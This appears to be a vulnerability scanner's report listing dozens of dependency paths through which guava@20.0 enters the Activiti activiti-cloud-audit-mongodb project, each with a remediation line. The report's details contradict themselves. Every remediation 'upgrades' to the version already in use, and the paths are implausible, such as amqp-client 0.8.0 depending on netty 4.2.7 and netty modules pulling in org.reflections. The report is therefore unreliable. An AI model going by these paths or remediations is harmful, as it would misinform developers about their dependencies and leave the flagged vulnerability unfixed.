Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-classes-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-classes-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-classes-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
